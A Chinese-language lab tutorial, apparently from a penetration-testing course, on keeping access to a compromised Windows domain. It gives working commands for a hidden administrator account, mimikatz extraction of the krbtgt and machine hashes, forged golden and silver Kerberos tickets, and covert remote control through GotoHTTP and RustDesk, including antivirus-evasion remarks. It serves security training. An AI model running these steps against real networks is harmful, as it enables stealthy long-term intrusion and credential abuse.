第142天: 内网安全-权限维持&黄金白银票据&隐藏账户&C2 远控&RustDesk&GotoHTTP

案例一: 内网域&单机版-权限维持-基于用户-隐藏用户

项目下载地址: GitHub - wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具

用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所以就会导致没办法删除

域环境

域中首先查看用户

利用工具添加隐藏用户的命令

复制代码
CreateHiddenAccount_upx_v0.2.exe -u jie -p admin!@#45

这个时候查看用户还是没有增加

利用工具-c命令可以查看隐藏用户

复制代码
CreateHiddenAccount_upx_v0.2.exe -c

在图形界面当中可以查看到

属于administrator用户组

尝试能否利用

利用密码建立ipc连接

点击删除是直接可以删除掉的

单机版

添加用户

查看用户

删除的时候删除不了

案例二: 内网域-权限维持-基于服务 TGT-黄金白银票据

黄金票据

⻩⾦ 票据 ⽣ 成攻击,是 ⽣ 成有效的 TGT Kerberos 票据,并且不受 TGT ⽣ 命周期的影响 ( TGT 默认 10 ⼩ 时,最多续订 7 天),这 ⾥ 可以为任意 ⽤ 户 ⽣ 成 ⻩⾦ 票据,然后为域管理
员 ⽣ 成 TGT ,这样普通 ⽤ 户就可以变成域管理员。

获取域名和sid

whoami ##获取本地账户

net time /domain ##获取域名

whoami /all ##获取sid:S-1-5-21-1218902331-2157346161-1782232778

获取当前域控是啥

需要获取krbtgt用户的hash,这个好像必须得高权限,但是现在做的是权限维持,你已经拿下了域控,不过是利用域控的身份在普通用户里面创建

privilege::debug

lsadump::lsa /patch /user:krbtgt ##b097d7ed97495408e1537f706c357fc5

创建黄金票据

复制代码
mimikatz kerberos::golden /user:随便一个用户 /domain:god.org /sid:用户对应的sid /krbtgt:krbtgt用户的hash /ticket:pj

mimikatz kerberos::golden /user:mary /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:pj

把票据导入

kerberos::ptt pj

查看当前的票据

dir查看文件

白银票据

白银票据( SILVER TICKET )是利用域的服务账户进行伪造的 ST ,在 Kerberos 认证
的第三步, Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求,
Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST ,从而获得
Session Key 。所以只需要知道 Server 用户的 Hash 就可以伪造出一个 ST ,且不会经
过 KDC ,但是伪造的门票只对部分服务起作用(不需要交互 KDC ,需要知道 Server 的
NTLM Hash )。

首先获取机器用户的hash

privilege::debug

sekurlsa::logonpasswords ##946d7b4709666cc91a496aa9e834cba8

导入白银票据,白银票据只能借助服务运行

复制代码
kerberos::golden /user:jie /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-GOD /service:cifs /rc4:946d7b4709666cc91a496aa9e834cba8 /ptt

kerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash  /ptt

cifs的话是文件共享服务,可以访问

案例三:内网域-权限维持-基于软件-GotoHTTP&RustDesk

GotoHTTP

下载地址:https://gotohttp.com/

gotohttp软件,优点无需安装,占用内存小,并且直接通过网页可以访问

上传以后直接执行会生成一个gotohttp.ini文件里面有访问的地址,以及账号密码

缺点是需要网络,但是内网一般是不出网的

该软件需要走的是https协议,会自动帮你解决免杀问题

一般可以利用cs中直接去查看这个文件

可以直接建立连接

RustDesk

这个程序最大的优点就是可以在内网中不用出网建立连接,并且可以绕过一部分杀毒软件

远程版,也就是需要联网,他的登录的id以及密码在下面的文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk.toml

直接输入id号通过密码连接即可

本地版

在下面这个文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk2.toml

加入这段数据

复制代码
direct-server = 'Y'      ##开启IP连接
direct-access-port = '8443' ##端口   

可以在内网中直接不出网建立连接

成功建立连接

相关推荐
一拳一个娘娘腔19 分钟前
第八期:实战演练 —— 构建一个完整的攻击链(模拟)
安全
星幻元宇VR22 分钟前
公共安全实训展厅设备【人防知识学习系统】
科技·学习·安全
想你依然心痛36 分钟前
嵌入式Linux安全加固:SELinux、Capabilities与Seccomp——强制访问控制与沙箱
linux·运维·安全
HackTwoHub1 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
MDM.Plus2 小时前
苹果MDM技术演进:从远程控制到设备信任体系的构建
运维·服务器·安全·ios·mdm·手机店
❀͜͡傀儡师3 小时前
2026年7月高危安全态势速览
安全
数据知道4 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
想你依然心痛5 小时前
内存安全语言在嵌入式中的对比:Rust vs Ada vs SPARK——形式化验证、运行时
安全·rust·spark
txg6665 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
云道轩5 小时前
DeepSeek using Claude Code 重构Oracle Fusion/SAP最佳业务实践:输入并补充Oracle Fusion 安全用户文档
安全·重构·oracle fusion